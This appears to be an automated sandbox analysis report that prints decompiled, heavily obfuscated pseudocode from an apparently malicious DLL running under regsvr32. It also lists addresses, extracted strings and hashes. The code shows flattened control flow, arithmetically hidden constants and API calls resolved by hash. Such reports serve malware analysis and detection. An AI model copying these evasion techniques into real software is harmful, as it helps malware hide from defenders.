							E040EC9B0(_v412, _t769, _v356,  *((intOrPtr*)(_t774 + 4)),  *_t774, _v548);
							_t774 = _v480;
							_t871 =  &(_t871[4]);
							_t864 = 0x7c1f8ac;
							_t769 = _t769 +  *((intOrPtr*)(_t774 + 4));
							goto L1;
						}
						if(_t864 == 0x5f37ccd) {
							_t867 =  &_v256;
							_push(_t774);
							_push(_t774);
							_t836 = E040ECCA0(8, 0x10);
							_t871 =  &(_t871[4]);
							_t732 = _v420;
							__eflags = _t732 - _t836;
							if(_t732 < _t836) {
								_t844 = _t836 - _t732;
								_t861 = _t867;
								_t786 = _t844 >> 1;
								__eflags = _t786;
								_t740 = memset(_t861, 0x2d002d, _t786 << 2);
								asm("adc ecx, ecx");
								_t867 = _t867 + _t844 * 2;
								memset(_t861 + _t786, _t740, 0);
								_t871 =  &(_t871[6]);
								_t774 = 0;
							}
							_push(_t774);
							_push(_t774);
							_t737 = E040ECCA0(8, 0x10);
							_push(_t867);
							_t860 = _t737;
							_push(_t860);
							_push(_v388);
							_t837 = 0xb;
							E040DE404(_v444, _t837);
							_t864 = 0xe33788a;
							goto L13;
						}
						if(_t864 == 0x77316ed) {
							_push(_v472);
							_push(_v468);
							_push(_v572);
							_t742 = E040EE1F8(0x40d17a8, _v372, __eflags);
							_t871 =  &(_t871[3]);
							_push( &_v256);
							_push(_t742);
							_push(_t860);
							_push(_v300);
							 *((intOrPtr*)(E040F31AA(0xb00b1257, 0x44)))();
							E040EFECB(_t742, _v324, _v564, _v524, _v380);
							_t864 = 0x86fed85;
							goto L13;
						}
						_t880 = _t864 - 0x7c1f8ac;
						if(_t864 != 0x7c1f8ac) {
							goto L31;
						}
						_push(_v520);
						_push(_v360);
						_push(0x40d1778);
						_t750 = E040D3325( &_v256, E040E4244(_v504, _v512, _t880), _v292 - _t769, _v352, _v408, _t769);
						E040EFECB(_t747, _v392, _v336, _v400, _v344);
						_t752 = _v296;
						 *_t752 = _t870;
						 *((intOrPtr*)(_t752 + 4)) = _t769 + _t750 - _t870;
						L10:
						return _v300;
						L31:
						__eflags = _t864 - 0xc7faa3a;
					} while (__eflags != 0);
					goto L10;
				}
			}

0x040e2e5d
0x040e2e5d
0x040e2e67
0x040e2e6e
0x040e2e72
0x040e2e7d
0x040e2e8d
0x040e2e94
0x040e2e99
0x040e2ea4
0x040e2eb4
0x040e2eb9
0x040e2ebf
0x040e2ec7
0x040e2ecc
0x040e2ed4
0x040e2edc
0x040e2ee4
0x040e2eec
0x040e2ef4
0x040e2efc
0x040e2f04
0x040e2f11
0x040e2f14
0x040e2f18
0x040e2f20
0x040e2f28
0x040e2f30
0x040e2f40
0x040e2f44
0x040e2f4c
0x040e2f54
0x040e2f5f
0x040e2f72
0x040e2f73
0x040e2f7a
0x040e2f85
0x040e2f8d
0x040e2f92
0x040e2f97
0x040e2f9f
0x040e2fa7
0x040e2fb2
0x040e2fba
0x040e2fc5
0x040e2fd9
0x040e2fe0
0x040e2feb
0x040e2ff6
0x040e2ffe
0x040e3003
0x040e300b
0x040e3013
0x040e301b
0x040e3028
0x040e302c
0x040e3034
0x040e303c
0x040e3047
0x040e3052
0x040e305d
0x040e3068
0x040e3070
0x040e3080
0x040e3085
0x040e308b
0x040e3090
0x040e3098
0x040e30a0
0x040e30ad
0x040e30ae
0x040e30b2
0x040e30ba
0x040e30c2
0x040e30cd
0x040e30d5
0x040e30e0
0x040e30eb
0x040e30f6
0x040e3101
0x040e310c
0x040e3117
0x040e3122
0x040e312a
0x040e3135
0x040e3140
0x040e3153
0x040e315a
0x040e3165
0x040e3172
0x040e3176
0x040e317e
0x040e3186
0x040e318e
0x040e319b
0x040e319f
0x040e31a7
0x040e31af
0x040e31b7
0x040e31c2
0x040e31cd
0x040e31d8
0x040e31eb
0x040e31f2
0x040e31fa
0x040e3205
0x040e3210
0x040e321b
0x040e3226
0x040e3231
0x040e323c
0x040e3247
0x040e3252
0x040e325d
0x040e3265
0x040e326f
0x040e3273
0x040e327b
0x040e3283
0x040e3297
0x040e329e
0x040e32a9
0x040e32b4
0x040e32bc
0x040e32c4
0x040e32c9
0x040e32ce
0x040e32d6
0x040e32e1
0x040e32e9
0x040e32f4
0x040e32fe
0x040e3303
0x040e3311
0x040e3316
0x040e331c
0x040e3324
0x040e332f
0x040e333f
0x040e3342
0x040e3349
0x040e3354
0x040e335c
0x040e3369
0x040e336d
0x040e3375
0x040e3380
0x040e338b
0x040e3396
0x040e339e
0x040e33a3
0x040e33ab
0x040e33b3
0x040e33bb
0x040e33c3
0x040e33cb
0x040e33d3
0x040e33db
0x040e33e3
0x040e33f6
0x040e33f9
0x040e3400
0x040e340b
0x040e3416
0x040e3421
0x040e342c
0x040e3437
0x040e3442
0x040e344d
0x040e3458
0x040e346e
0x040e3475
0x040e347d
0x040e3488
0x040e3490
0x040e349c
0x040e349f
0x040e34a3
0x040e34a8
0x040e34b0
0x040e34bb
0x040e34c6
0x040e34d1
0x040e34dc
0x040e34e4
0x040e34ef
0x040e34fa
0x040e3505
0x040e3510
0x040e351b
0x040e3526
0x040e3539
0x040e3540
0x040e354d
0x040e3555
0x040e355d
0x040e3565
0x040e356a
0x040e3572
0x040e357d
0x040e3588
0x040e3593
0x040e359e
0x040e35a6
0x040e35b1
0x040e35c5
0x040e35ca
0x040e35d3
0x040e35de
0x040e35ea
0x040e35ef
0x040e35f5
0x040e35fd
0x040e3602
0x040e360a
0x040e3615
0x040e3620
0x040e362b
0x040e363e
0x040e3641
0x040e3653
0x040e365a
0x040e3665
0x040e3670
0x040e3678
0x040e3683
0x040e368e
0x040e3696
0x040e369e
0x040e36a9
0x040e36b4
0x040e36bf
0x040e36ca
0x040e36d7
0x040e36da
0x040e36de
0x040e36e3
0x040e36eb
0x040e36f3
0x040e3703
0x040e3707
0x040e370f
0x040e3717
0x040e371f
0x040e3727
0x040e372f
0x040e3737
0x040e373c
0x040e3744
0x040e3756
0x040e3759
0x040e3760
0x040e376d
0x040e3775
0x040e3784
0x040e3787
0x040e378e
0x040e3792
0x040e379a
0x040e37a2
0x040e37b2
0x040e37ba
0x040e37bf
0x040e37c6
0x040e37ca
0x040e37d2
0x040e37da
0x040e37ee
0x040e37f5
0x040e37fc
0x040e3807
0x040e381a
0x040e3821
0x040e3829
0x040e3834
0x040e383f
0x040e3852
0x040e3859
0x040e3864
0x040e386f
0x040e387a
0x040e3885
0x040e3890
0x040e3898
0x040e38a3
0x040e38ae
0x040e38b9
0x040e38c1
0x040e38cc
0x040e38d7
0x040e38e2
0x040e38ed
0x040e38f5
0x040e38fd
0x040e390a
0x040e390e
0x040e3916
0x040e3921
0x040e392c
0x040e3934
0x040e393f
0x040e393f
0x040e393f
0x040e3944
0x040e3944
0x040e3944
0x040e3944
0x040e394a
0x00000000
0x00000000
0x040e3be6
0x040e3be8
0x040e3ca8
0x040e3caf
0x040e3cb2
0x040e3cc7
0x040e3ccc
0x040e3cd3
0x040e3cda
0x040e3d26
0x040e3d34
0x040e3d39
0x040e3d40
0x040e3d43
0x040e3d48
0x00000000
0x040e3d48
0x040e3bee
0x040e3bf4
0x040e3c6d
0x040e3c84
0x040e3c85
0x040e3c87
0x040e3c8c
0x040e3c8f
0x040e3c96
0x040e3c98
0x040e3a22
0x040e3a22
0x040e3c9e
0x040e3a8d
0x040e3a8d
0x040e393f
0x040e393f
0x040e393f
0x00000000
0x040e393f
0x040e393f
0x040e3bf6
0x040e3bfc
0x040e3c36
0x040e3c37
0x040e3c41
0x040e3c4a
0x040e3c4b
0x040e3c4c
0x040e3c59
0x040e3c5a
0x040e3c5f
0x040e3a8a
0x040e3a8a
0x00000000
0x040e3a8a
0x040e3bfe
0x040e3c04
0x040e3d77
0x00000000
0x040e3d7e
0x040e3c0a
0x040e3c10
0x00000000
0x00000000
0x040e3c16
0x040e3c16
0x040e3950
0x040e3bb0
0x040e3bc1
0x040e3bc2
0x040e3bc4
0x040e3bc9
0x040e3bcd
0x040e3bcf
0x040e3bd7
0x040e3bd9
0x040e3bde
0x00000000
0x040e3bde
0x040e395c
0x040e3b72
0x040e3b73
0x040e3b7d
0x040e3b86
0x040e3b87
0x040e3b88
0x040e3b95
0x040e3b96
0x040e3b9b
0x00000000
0x040e3b9b
0x040e3968
0x040e3b46
0x040e3b4b
0x040e3b52
0x040e3b55
0x040e3b5a
0x00000000
0x040e3b5a
0x040e3974
0x040e3a9d
0x040e3ab6
0x040e3ab7
0x040e3ac1
0x040e3ac3
0x040e3ac6
0x040e3acd
0x040e3acf
0x040e3ad1
0x040e3ad3
0x040e3adc
0x040e3adc
0x040e3ade
0x040e3ae0
0x040e3ae2
0x040e3ae5
0x040e3ae5
0x040e3ae5
0x040e3ae5
0x040e3afe
0x040e3aff
0x040e3b04
0x040e3b09
0x040e3b0a
0x040e3b0c
0x040e3b0d
0x040e3b1d
0x040e3b1e
0x040e3b23
0x00000000
0x040e3b23
0x040e3980
0x040e3a23
0x040e3a2c
0x040e3a33
0x040e3a3e
0x040e3a43
0x040e3a54
0x040e3a55
0x040e3a56
0x040e3a57
0x040e3a66
0x040e3a80
0x040e3a85
0x00000000
0x040e3a85
0x040e3986
0x040e398c
0x00000000
0x00000000
0x040e3992
0x040e3996
0x040e39a5
0x040e39d6
0x040e39fb
0x040e3a00
0x040e3a0c
0x040e3a0e
0x040e3a11
0x00000000
0x040e3d4d
0x040e3d4d
0x040e3d4d
0x00000000
0x040e3d59

Strings

-3n3, xrefs: 040E2F18
*a<, xrefs: 040E354D
DO, xrefs: 040E371F
Gd, xrefs: 040E3117
1TPy, xrefs: 040E310C
|I9, xrefs: 040E31A7
I,, xrefs: 040E2F85
$7, xrefs: 040E3231
DJ3, xrefs: 040E2F28
3, xrefs: 040E2FBA
8j, xrefs: 040E35A6
kn_, xrefs: 040E30C2
!s9, xrefs: 040E3375
9I , xrefs: 040E3834
Sg, xrefs: 040E3098
IF, xrefs: 040E3380
5S, xrefs: 040E357D

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !s9$*a<$-3n3$1TPy$5S$8j$9I $DJ3$IF$Sg$kn_$|I9$$7$3$DO$Gd$I,
API String ID: 0-3070105227
Opcode ID: b5b2d29175f5e68f1999396d3068f84c0bb33288d31eba30692112f263b043fe
Instruction ID: ace59807678f30d5d0b0d53ff8a728df1908289f57e1a36d14e39d1fe39cea9f
Opcode Fuzzy Hash: b5b2d29175f5e68f1999396d3068f84c0bb33288d31eba30692112f263b043fe
Instruction Fuzzy Hash: B47200715083819FD3B8CF25C58AB9BBBE1BBC4718F10891DE6D99A260D7B09949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040D3431, Relevance: 17.0, Strings: 13, Instructions: 746
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E040D3431(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				void* _t880;
				void* _t883;
				intOrPtr _t884;
				intOrPtr _t891;
				void* _t892;
				signed int _t894;
				char _t897;
				void* _t905;
				intOrPtr _t918;
				void* _t919;
				intOrPtr _t925;
				intOrPtr _t927;
				void* _t929;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				void* _t952;
				intOrPtr _t974;
				intOrPtr _t977;
				void* _t1017;
				intOrPtr _t1018;
				void* _t1038;
				intOrPtr _t1039;
				void* _t1041;
				void* _t1046;
				signed int* _t1048;
				signed int* _t1052;
				void* _t1054;

				_t1048 =  &_v448;
				_v436 = 0x369131;
				_v436 = _v436 >> 0xc;
				_v72 = __ecx;
				_t1046 = 0;
				_t935 = 0x47;
				_v436 = _v436 / _t935;
				_t929 = 0xda5043f;
				_t936 = 0x5f;
				_v436 = _v436 * 0x17;
				_v436 = _v436 ^ 0x4d42455f;
				_v208 = 0xf6fdfa;
				_v208 = _v208 | 0x2cc981c8;
				_v208 = _v208 ^ 0x2cfffdfb;
				_v424 = 0xd0dd87;
				_v424 = _v424 << 0xd;
				_v424 = _v424 | 0x1c0753be;
				_v424 = _v424 << 0xb;
				_v424 = _v424 ^ 0xbf9df000;
				_v168 = 0x27916c;
				_v168 = _v168 << 0xc;
				_v168 = _v168 ^ 0x7916c000;
				_v112 = 0xb477a9;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0xa3bd4800;
				_v220 = 0xe97999;
				_v220 = _v220 + 0xffffec6a;
				_v220 = _v220 ^ 0x00e96603;
				_v204 = 0x9e1a7f;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0x0004f0d3;
				_v268 = 0x424ea5;
				_v268 = _v268 ^ 0x63de6ac8;
				_v268 = _v268 + 0xffff47e2;
				_v268 = _v268 ^ 0x639b6c4f;
				_v260 = 0xd00e0b;
				_v260 = _v260 + 0x7bec;
				_v260 = _v260 + 0x9dda;
				_v260 = _v260 ^ 0x00d127d1;
				_v200 = 0x4c3c29;
				_v200 = _v200 + 0xffffc8b9;
				_v200 = _v200 ^ 0x004c04e2;
				_v248 = 0x4debf8;
				_v248 = _v248 + 0xffff1b2a;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0x9a0e4400;
				_v228 = 0x8afd86;
				_v228 = _v228 / _t936;
				_v228 = _v228 << 4;
				_v228 = _v228 ^ 0x001768a0;
				_v96 = 0x2eb3c6;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xd678c020;
				_v420 = 0x274aed;
				_v420 = _v420 | 0x31740d1a;
				_v420 = _v420 + 0xffff9582;
				_v420 = _v420 | 0x350cf820;
				_v420 = _v420 ^ 0x35767196;
				_v364 = 0x6881b7;
				_v364 = _v364 * 7;
				_v364 = _v364 + 0xffffc912;
				_v364 = _v364 * 0x25;
				_v364 = _v364 ^ 0x69b6ddf9;
				_v184 = 0xd44f20;
				_v184 = _v184 ^ 0xce5a0ea9;
				_v184 = _v184 ^ 0xce89b855;
				_v264 = 0x81d5a2;
				_v264 = _v264 >> 8;
				_v264 = _v264 ^ 0x29112c15;
				_v264 = _v264 ^ 0x291faa41;
				_v100 = 0x37cb15;
				_t937 = 6;
				_v100 = _v100 * 0x62;
				_v100 = _v100 ^ 0x1559514e;
				_v380 = 0xd5dbc2;
				_v380 = _v380 ^ 0x7753e321;
				_v380 = _v380 + 0xffff7b0c;
				_v380 = _v380 << 8;
				_v380 = _v380 ^ 0x85ba1641;
				_v176 = 0xe5b425;
				_v176 = _v176 ^ 0xa878a978;
				_v176 = _v176 ^ 0xa898c785;
				_v120 = 0xd260b8;
				_v120 = _v120 / _t937;
				_v120 = _v120 ^ 0x00230c57;
				_v288 = 0xdcc1d5;
				_v288 = _v288 | 0xf1bc740f;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x000063e4;
				_v232 = 0xe5d66a;
				_t938 = 0x2c;
				_v232 = _v232 * 0x6c;
				_v232 = _v232 / _t938;
				_v232 = _v232 ^ 0x02301c7d;
				_v296 = 0x2a124;
				_v296 = _v296 | 0xd0f8a1f6;
				_v296 = _v296 >> 3;
				_v296 = _v296 ^ 0x1a145567;
				_v160 = 0xc3c6af;
				_v160 = _v160 + 0xd2dc;
				_v160 = _v160 ^ 0x00c22786;
				_v348 = 0x8f150e;
				_v348 = _v348 + 0xa59e;
				_t939 = 0x59;
				_v348 = _v348 / _t939;
				_v348 = _v348 >> 0xe;
				_v348 = _v348 ^ 0x00038203;
				_v412 = 0x22c1c6;
				_v412 = _v412 | 0x52a0f1e9;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0x5f9c;
				_v412 = _v412 ^ 0x0003206f;
				_v256 = 0x6eace8;
				_v256 = _v256 | 0x5e36471d;
				_v256 = _v256 + 0xaa22;
				_v256 = _v256 ^ 0x5e7c911d;
				_v372 = 0x114227;
				_v372 = _v372 << 0xe;
				_v372 = _v372 >> 4;
				_v372 = _v372 + 0xffff3250;
				_v372 = _v372 ^ 0x05091a3a;
				_v152 = 0xb2c113;
				_v152 = _v152 | 0xd4a79ff0;
				_v152 = _v152 ^ 0xd4b69369;
				_v404 = 0xac8dd0;
				_v404 = _v404 | 0xfe2c74c4;
				_v404 = _v404 + 0xfffff2df;
				_v404 = _v404 ^ 0xd6ca137b;
				_v404 = _v404 ^ 0x2865160f;
				_v92 = 0xc872d4;
				_v92 = _v92 ^ 0x1ab36d9e;
				_v92 = _v92 ^ 0x1a793755;
				_v104 = 0x4ab196;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0x4ab50517;
				_v448 = 0xada0e7;
				_t940 = 0x71;
				_v448 = _v448 * 0x69;
				_v448 = _v448 ^ 0xf900bd50;
				_v448 = _v448 + 0x197e;
				_v448 = _v448 ^ 0xbe3853b0;
				_v396 = 0x11e923;
				_v396 = _v396 + 0x3954;
				_v396 = _v396 / _t940;
				_v396 = _v396 >> 0xc;
				_v396 = _v396 ^ 0x00018e0c;
				_v336 = 0x5f85c1;
				_v336 = _v336 | 0x2e05641a;
				_v336 = _v336 + 0xffffe3b2;
				_v336 = _v336 ^ 0x2e57dda5;
				_v144 = 0xd04b4f;
				_v144 = _v144 | 0x24a920ad;
				_v144 = _v144 ^ 0x24f2194c;
				_v332 = 0xa51135;
				_v332 = _v332 | 0x0e3f3b11;
				_v332 = _v332 << 1;
				_v332 = _v332 ^ 0x1d7bc296;
				_v432 = 0x91d3da;
				_v432 = _v432 ^ 0xfb7827da;
				_v432 = _v432 ^ 0x8307cadb;
				_v432 = _v432 ^ 0x96a6215b;
				_v432 = _v432 ^ 0xee460da5;
				_v440 = 0x76ea73;
				_t941 = 0x68;
				_v440 = _v440 * 0x64;
				_v440 = _v440 * 0x74;
				_v440 = _v440 + 0xffff4177;
				_v440 = _v440 ^ 0x0c5f6cc4;
				_v84 = 0xe35803;
				_v84 = _v84 << 2;
				_v84 = _v84 ^ 0x038e6518;
				_v416 = 0xaf3ba8;
				_v416 = _v416 / _t941;
				_v416 = _v416 << 4;
				_v416 = _v416 ^ 0x48935165;
				_v416 = _v416 ^ 0x4881449f;
				_v212 = 0x801900;
				_v212 = _v212 + 0xffff42b5;
				_v212 = _v212 ^ 0x0072cd25;
				_v308 = 0xdd451d;
				_v308 = _v308 << 7;
				_v308 = _v308 + 0xffff5c98;
				_v308 = _v308 ^ 0x6ea87981;
				_v400 = 0xde1a46;
				_v400 = _v400 + 0xffff765a;
				_v400 = _v400 / _t941;
				_v400 = _v400 << 9;
				_v400 = _v400 ^ 0x044894be;
				_v316 = 0xd965ab;
				_t942 = 0x67;
				_v316 = _v316 / _t942;
				_v316 = _v316 ^ 0xab5bfdd1;
				_v316 = _v316 ^ 0xab5ad192;
				_v408 = 0x2ea377;
				_v408 = _v408 ^ 0x7c77aa70;
				_v408 = _v408 * 0x1b;
				_t943 = 0x5b;
				_v408 = _v408 / _t943;
				_v408 = _v408 ^ 0x00544ec9;
				_v324 = 0xbe9a08;
				_t944 = 0x3b;
				_v324 = _v324 * 0x43;
				_v324 = _v324 >> 2;
				_v324 = _v324 ^ 0x0c769314;
				_v300 = 0x976b15;
				_v300 = _v300 + 0xffff7da5;
				_v300 = _v300 ^ 0x81b758ca;
				_v300 = _v300 ^ 0x81238506;
				_v180 = 0xcec496;
				_v180 = _v180 + 0xd8a;
				_v180 = _v180 ^ 0x00c56088;
				_v188 = 0xaed086;
				_v188 = _v188 / _t944;
				_v188 = _v188 ^ 0x0009ea52;
				_v196 = 0x3b56fa;
				_v196 = _v196 ^ 0xac6111bd;
				_v196 = _v196 ^ 0xac5e4370;
				_v292 = 0x9c517b;
				_t945 = 0xe;
				_v292 = _v292 * 0x4d;
				_v292 = _v292 << 0x10;
				_v292 = _v292 ^ 0x81f0babf;
				_v164 = 0xb8b001;
				_v164 = _v164 * 0x6d;
				_v164 = _v164 ^ 0x4ea63487;
				_v172 = 0xad6cfe;
				_v172 = _v172 + 0xffff2ed4;
				_v172 = _v172 ^ 0x00a06f33;
				_v392 = 0x7c182;
				_v392 = _v392 + 0xffff354a;
				_v392 = _v392 >> 9;
				_v392 = _v392 | 0x25902c29;
				_v392 = _v392 ^ 0x259a4e3f;
				_v384 = 0x5bc0d6;
				_v384 = _v384 << 1;
				_v384 = _v384 >> 3;
				_v384 = _v384 >> 0xb;
				_v384 = _v384 ^ 0x00007445;
				_v148 = 0xb53a42;
				_v148 = _v148 + 0x9a8c;
				_v148 = _v148 ^ 0x00ba1df9;
				_v340 = 0x4937cc;
				_v340 = _v340 / _t945;
				_v340 = _v340 * 0x55;
				_v340 = _v340 ^ 0x01b4526f;
				_v156 = 0xcb2355;
				_v156 = _v156 + 0x87d8;
				_v156 = _v156 ^ 0x00cab12c;
				_v276 = 0x1d3606;
				_v276 = _v276 ^ 0xef8573e3;
				_v276 = _v276 + 0xe74c;
				_v276 = _v276 ^ 0xef9451f2;
				_v124 = 0xea90d8;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 ^ 0x000c3a09;
				_v132 = 0x9d7def;
				_v132 = _v132 << 0xe;
				_v132 = _v132 ^ 0x5f719987;
				_v376 = 0x89d7c2;
				_v376 = _v376 + 0xfffff23e;
				_v376 = _v376 | 0x7c68b11f;
				_v376 = _v376 ^ 0xbb3726b5;
				_v376 = _v376 ^ 0xc7d510ca;
				_v140 = 0x76a014;
				_t946 = 0x62;
				_v140 = _v140 * 0x5d;
				_v140 = _v140 ^ 0x2b1c15f7;
				_v236 = 0x97a0b2;
				_v236 = _v236 + 0xb8c3;
				_v236 = _v236 / _t946;
				_v236 = _v236 ^ 0x00048326;
				_v244 = 0xf40f05;
				_v244 = _v244 >> 9;
				_v244 = _v244 + 0xffff2918;
				_v244 = _v244 ^ 0xfff951ac;
				_v252 = 0x8be7d4;
				_t947 = 0x63;
				_v252 = _v252 * 0x1e;
				_v252 = _v252 | 0x42cac185;
				_v252 = _v252 ^ 0x52ef1e67;
				_v116 = 0xbde76;
				_v116 = _v116 * 0x7b;
				_v116 = _v116 ^ 0x05b04958;
				_v328 = 0xeb1d65;
				_v328 = _v328 + 0xffffd1f9;
				_v328 = _v328 / _t947;
				_v328 = _v328 ^ 0x00025d34;
				_v280 = 0x68b6dc;
				_v280 = _v280 << 4;
				_v280 = _v280 + 0xffffca90;
				_v280 = _v280 ^ 0x06815cee;
				_v284 = 0x6fbf52;
				_t948 = 0x39;
				_v284 = _v284 / _t948;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 ^ 0x000af32e;
				_v128 = 0xe16a7a;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0x85a6bd86;
				_v136 = 0xc45446;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x21b71382;
				_v356 = 0x71f336;
				_v356 = _v356 ^ 0x2de7f7fe;
				_v356 = _v356 ^ 0x8a07c7d3;
				_v356 = _v356 ^ 0x93c759d9;
				_v356 = _v356 ^ 0x3457e38a;
				_v444 = 0xc2e3ca;
				_v444 = _v444 + 0xd370;
				_v444 = _v444 * 0x17;
				_v444 = _v444 | 0x81628588;
				_v444 = _v444 ^ 0x91feaa64;
				_v216 = 0xda26e7;
				_v216 = _v216 | 0x60c5a9c9;
				_v216 = _v216 ^ 0x60dd12b5;
				_v192 = 0x3f7410;
				_v192 = _v192 ^ 0x1d5bbab7;
				_v192 = _v192 ^ 0x1d6fbf93;
				_v312 = 0x4ada65;
				_v312 = _v312 << 0xd;
				_v312 = _v312 >> 7;
				_v312 = _v312 ^ 0x00bfdaf9;
				_v272 = 0xabf11;
				_v272 = _v272 | 0xa59dca8e;
				_v272 = _v272 + 0x20a8;
				_v272 = _v272 ^ 0xa5a7fe59;
				_v224 = 0x8674d0;
				_t1041 = 0x129d0b2;
				_t1038 = 0x319c4b5;
				_t949 = 0x14;
				_v224 = _v224 / _t949;
				_v224 = _v224 ^ 0x000de1f0;
				_v320 = 0xda9bb0;
				_v320 = _v320 | 0x2a57cad9;
				_t950 = 0x36;
				_v320 = _v320 * 0xf;
				_v320 = _v320 ^ 0x831ebdeb;
				_v240 = 0xa163ed;
				_v240 = _v240 * 0xb;
				_v240 = _v240 ^ 0x8dcbf844;
				_v240 = _v240 ^ 0x8b2bfc33;
				_v428 = 0x5ed42b;
				_v428 = _v428 + 0xffff1d19;
				_v428 = _v428 * 0x50;
				_v428 = _v428 << 2;
				_v428 = _v428 ^ 0x75680dd8;
				_v88 = 0xfa72dc;
				_v88 = _v88 >> 7;
				_v88 = _v88 ^ 0x0007f8f8;
				_v388 = 0x10dc91;
				_v388 = _v388 / _t950;
				_v388 = _v388 >> 2;
				_v388 = _v388 | 0xaac1de12;
				_v388 = _v388 ^ 0xaac723cf;
				_v304 = 0xa7cb34;
				_v304 = _v304 ^ 0x1c82ce84;
				_v304 = _v304 + 0xffff27ec;
				_v304 = _v304 ^ 0x1c2c2c1b;
				_v360 = 0x85a407;
				_v360 = _v360 << 0x10;
				_v360 = _v360 ^ 0xf399b7e8;
				_t951 = 0x7b;
				_v360 = _v360 * 0xb;
				_v360 = _v360 ^ 0xc3d703da;
				_v108 = 0x2c5900;
				_v108 = _v108 | 0x18e96d33;
				_v108 = _v108 ^ 0x18efd740;
				_v368 = 0x82a9c5;
				_v368 = _v368 * 0x63;
				_v368 = _v368 / _t951;
				_v368 = _v368 << 9;
				_v368 = _v368 ^ 0xd254d318;
				_v344 = 0x646456;
				_v344 = _v344 | 0x8bd14a3d;
				_v344 = _v344 ^ 0xb757bf6b;
				_v344 = _v344 ^ 0xc7e8113d;
				_v344 = _v344 ^ 0xfb40f9ed;
				_v352 = 0x76afda;
				_v352 = _v352 | 0xbd2b6ebb;
				_v352 = _v352 + 0xffffcbc9;
				_v352 = _v352 << 5;
				_v352 = _v352 ^ 0xaffdfdca;
				while(1) {
					L1:
					_t1017 = 0xbed0fa7;
					_t952 = 0x2dc73db;
					_t880 = 0x45ef02b;
					goto L2;
					do {
						while(1) {
							L2:
							_t1054 = _t929 - _t880;
							if(_t1054 <= 0) {
								break;
							}
							__eflags = _t929 - 0xa3576f8;
							if(_t929 == 0xa3576f8) {
								_t1018 =  *0x40f6224; // 0x0
								E040F2B09(_v360,  *((intOrPtr*)(_t1018 + 0x50)), _v108, _v368);
								_t929 = _t1038;
								L25:
								_t880 = 0x45ef02b;
								_t952 = 0x2dc73db;
								_t1017 = 0xbed0fa7;
								goto L26;
							}
							__eflags = _t929 - _t1017;
							if(__eflags == 0) {
								_push(_v156);
								_push(_v340);
								_push(_v148);
								_t883 = E040EE1F8(0x40d13f8, _v384, __eflags);
								_t884 =  *0x40f6224; // 0x0
								__eflags = E040DF288(_v268, _v276, _t883, _v124,  &_v76, _t884 + 0x54, _v132, 0x40d13f8, _v376, _v80, _v140) - _v260;
								_t929 =  ==  ? 0x2dc73db : _t1038;
								E040EFECB(_t883, _v236, _v244, _v252, _v116);
								_t1048 =  &(_t1048[0xf]);
								L15:
								_t1041 = 0x129d0b2;
								goto L25;
							}
							__eflags = _t929 - 0xda5043f;
							if(__eflags != 0) {
								goto L26;
							}
							_t929 = 0x2e16ae;
						}
						if(_t1054 == 0) {
							_push(_v336);
							_push(_v396);
							_push(_v448);
							_t891 = E040EE1F8(0x40d13a8, _v104, __eflags);
							_push(_v440);
							_t1039 = _t891;
							_push(_v432);
							_push(_v332);
							_t892 = E040EE1F8(0x40d1498, _v144, __eflags);
							_v64 = _v424;
							_t894 = E040E00C5(_t1039, _v84, _v416);
							_v56 = _v56 & 0x00000000;
							_v60 = _t1039;
